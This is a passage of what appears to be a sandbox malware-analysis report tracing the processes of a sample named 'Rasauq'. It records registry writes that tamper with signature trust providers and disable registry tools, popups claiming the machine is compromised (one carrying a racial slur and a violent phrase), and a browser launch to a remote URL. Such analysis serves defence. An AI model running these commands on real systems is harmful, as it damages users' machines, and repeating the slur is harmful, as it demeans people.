      reg add "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:2648
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:4448
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      PID:1120
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\AppDataLow\Software\Software\Rasauq on top" /f
      4⤵
      PID:1724
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      PID:3532
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_CURRENT_USER\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      PID:1744
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      PID:2936
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:4504
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Software\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:5256
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:4500
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKwN2EBJ1Cyr7HTF0\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:1348
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:5724
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Software\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:1688
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:4720
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKwN2EBJ1Cyr7HTF0\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:3972
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:3356
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:4996
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:1624
  - - C:\Windows\system32\reg.exe
      reg add "End of search: 26 match(es) found.\Software\Rasauq on top" /f
      4⤵
      PID:2204
  - - C:\Windows\system32\msg.exe
      msg * /time:3 "This machine has been compromised by Rasuaq"
      4⤵
      PID:920
  - - C:\Windows\system32\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4880
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
      4⤵
      Disables RegEdit via registry modification
      PID:640
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:3564
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5252
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:2484
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5040
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3568
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:1508
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument https://pattern-cyber-report.glitch.me/
        5⤵
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Modifies registry class
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:1488
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x25c,0x7ffb56a1f208,0x7ffb56a1f214,0x7ffb56a1f220
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2452
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=fallback-handler --database="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --exception-pointers=112115826672576 --process=264 /prefetch:7 --thread=5540
        7⤵
        
        PID:7956
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2212,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=2204 /prefetch:2
        6⤵
        
        PID:3880
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1988,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=1980 /prefetch:3
        6⤵
        
        PID:3904
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2540,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=2552 /prefetch:8
        6⤵
        
        PID:1236
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3520,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=3572 /prefetch:1
        6⤵
        
        PID:964
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3540,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=3576 /prefetch:1
        6⤵
        
        PID:4476
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4860,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=4856 /prefetch:1
        6⤵
        
        PID:5404
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=5020,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=5180 /prefetch:1
        6⤵
        
        PID:3396
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=5352,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=5368 /prefetch:1
        6⤵
        
        PID:5284
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=5528,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=3636 /prefetch:1
        6⤵
        
        PID:4768
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=5888,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=5880 /prefetch:1
        6⤵
        
        PID:5892
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=6028,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=6024 /prefetch:1
        6⤵
        
        PID:2912
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=6336,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=6288 /prefetch:1
        6⤵
        
        PID:1668
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=6548,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=6576 /prefetch:1
        6⤵
        
        PID:2536
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6832,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=6888 /prefetch:8
        6⤵
        
        PID:1764
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6860,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=6948 /prefetch:8
        6⤵
        
        PID:3672
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7284,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=7296 /prefetch:8
        6⤵
        
        PID:2932
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=7660,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=7668 /prefetch:1
        6⤵
        
        PID:3772
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=8076,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=8116 /prefetch:1
        6⤵
        
        PID:960
      - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7432,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=7288 /prefetch:8
        6⤵
        
        PID:4552
      - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7432,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=7288 /prefetch:8
        6⤵
        
        PID:292
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --always-read-main-dll --field-trial-handle=8500,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=8520 /prefetch:1
        6⤵
        
        PID:3592
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --always-read-main-dll --field-trial-handle=7888,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=7872 /prefetch:1
        6⤵
        
        PID:3356
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=8280,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=8068 /prefetch:1
        6⤵
        
        PID:4944
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=6140,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=7816 /prefetch:1
        6⤵
        
        PID:852
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=6588,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=5636 /prefetch:1
        6⤵
        
        PID:4792
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=8804,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=8852 /prefetch:1
        6⤵
        
        PID:3408
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=9028,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=9068 /prefetch:1
        6⤵
        
        PID:712
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=8988,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=9152 /prefetch:1
        6⤵
        
        PID:1596
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=9428,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=9408 /prefetch:1
        6⤵
        
        PID:6052
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=9532,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=9552 /prefetch:1
        6⤵
        
        PID:212
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=9728,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=9516 /prefetch:1
        6⤵
        
        PID:3888
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=9880,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=9920 /prefetch:1
        6⤵
        
        PID:4728
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=10100,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=10068 /prefetch:1
        6⤵
        
        PID:5060
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=5652,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=10252 /prefetch:1
        6⤵
        
        PID:5628
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=10476,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=10436 /prefetch:1
        6⤵
        
        PID:1672
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=10608,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=10656 /prefetch:1
        6⤵
        
        PID:5636
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10592,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=560 /prefetch:8
        6⤵
        
        PID:6264
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10568,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=10788 /prefetch:8
        6⤵
        
        PID:6272
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10784,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=10864 /prefetch:8
        6⤵
        
        PID:6280
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --always-read-main-dll --field-trial-handle=10448,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=10952 /prefetch:1
        6⤵
        
        PID:6600
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=9896,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=11144 /prefetch:1
        6⤵
        
        PID:6880
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
